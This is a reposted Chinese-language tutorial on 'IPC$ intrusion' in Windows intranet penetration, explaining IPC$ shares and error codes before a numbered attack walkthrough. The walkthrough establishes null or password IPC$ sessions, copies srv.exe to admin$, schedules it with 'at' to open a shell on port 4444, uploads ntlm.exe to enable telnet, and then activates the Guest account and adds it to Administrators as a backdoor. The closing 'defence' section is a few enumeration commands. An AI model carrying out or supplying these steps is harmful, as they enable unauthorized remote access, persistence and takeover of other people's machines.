4. 內網滲透之IPC$入侵


IPC$連接

IPC$的概念:

IPC$(Internet Process Connection)是共享”命名管道”的資源,它是為了讓進程間通信而開放的
命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。

IPC$的作用:

利用IPC$,連接者甚至可以與目標主機建立一個連接,利用這個連接,連接者可以得到目標主機上的目錄結構、用戶列表等信息。

IPC$的利用條件:

1. 139,445端口開啟     
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過
139,
445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.

2. 管理員開啟了默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或
windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問

IPC$連接失敗的原因:

1.你的系統不是NT或以上操作系統.
2.對方沒有打開ipc$默認共享。
3.不能成功連接目標的139,445端口.
4.命令輸入錯誤.
5.用戶名或密碼錯誤.

常見錯誤號:

1.錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
2.錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
3.錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
4.錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$; 
5.錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。 6.錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了; 7.錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況) 8.錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。

具體操作命令:

1.建立IPC$空連接:

net use \\127.0.0.1\ipc$ "" /user:""

2.建立完整的用戶名,密碼連接:

net use \\127.0.0.1\ipc$ "password" /user:"username"

3.映射路徑:

net use z: \\127.0.0.1\c$ "密碼" /user:"用戶名"  (即可將對方的c盤映射為自己的z盤,其他盤類推)

4.訪問/刪除路徑:

net use z: \\127.0.0.1\c$ #直接訪問 net use c: /del 刪除映射的c盤,其他盤類推 net use * /del      刪除全部,會有提示要求按y確認

5.刪除IPC$連接:

net use \\127.0.0.1\ipc$ /del

6.入侵過程:

(1)

C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 

這是用《流光》掃到的用戶名是administrators,密碼為""的IP地址,如果是打算攻擊的話,
就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"",所以第一個引號處就不用輸入,
后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。

(2)

C:\>copy srv.exe \\127.0.0.1\admin$ 
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,
大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。

(3)

C:\>net time \\127.0.0.1 

查查時間,發現127.0.0.1 的當前時間是 2019/2/8 上午 11:00,命令成功完成。

(4)

C:\>at \\127.0.0.1 11:05 srv.exe 
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)

(5)

C:\>net time \\127.0.0.1

再查查到時間沒有?如果127.0.0.1 的當前時間是 2019/2/8 上午 11:05,說明srv.exe已經執行,那就准備開始下面的命令。

(6)

C:\>telnet 127.0.0.1 4444
這里會用到Telnet命令吧,注意端口是4444。Telnet默認的是23端口,但是我們使用的是srv.exe在對方計算機中為我們建立一個4444端口的Shell。 雖然我們可以Telnet上去了,但是srv.exe是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了

(7)

C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

(8)

C:\WINNT\system32>ntlm 輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。 當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務! 

(9)

Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單

(10)

為了以防萬一,我們再把guest激活加到管理組 C:\>net user guest /active:yes 將對方的Guest用戶激活

(11)

C:\>net user guest 123456
將Guest的密碼改為123456,或者你要設定的密碼

(12)

C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)

7.如何防御IPC$入侵:

net share #查看自己的共享 net view \\IP #查看target的共享 netstat -A IP   #獲取target的user列表

8.netstat延伸使用:

netstat -ano | findstr "port"  #查看端口號對應的PID tasklist | findstr "PID"       #查看進程號對應的程序

 

參考連接:

內網滲透實戰-IPC$入侵之遠程控制

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM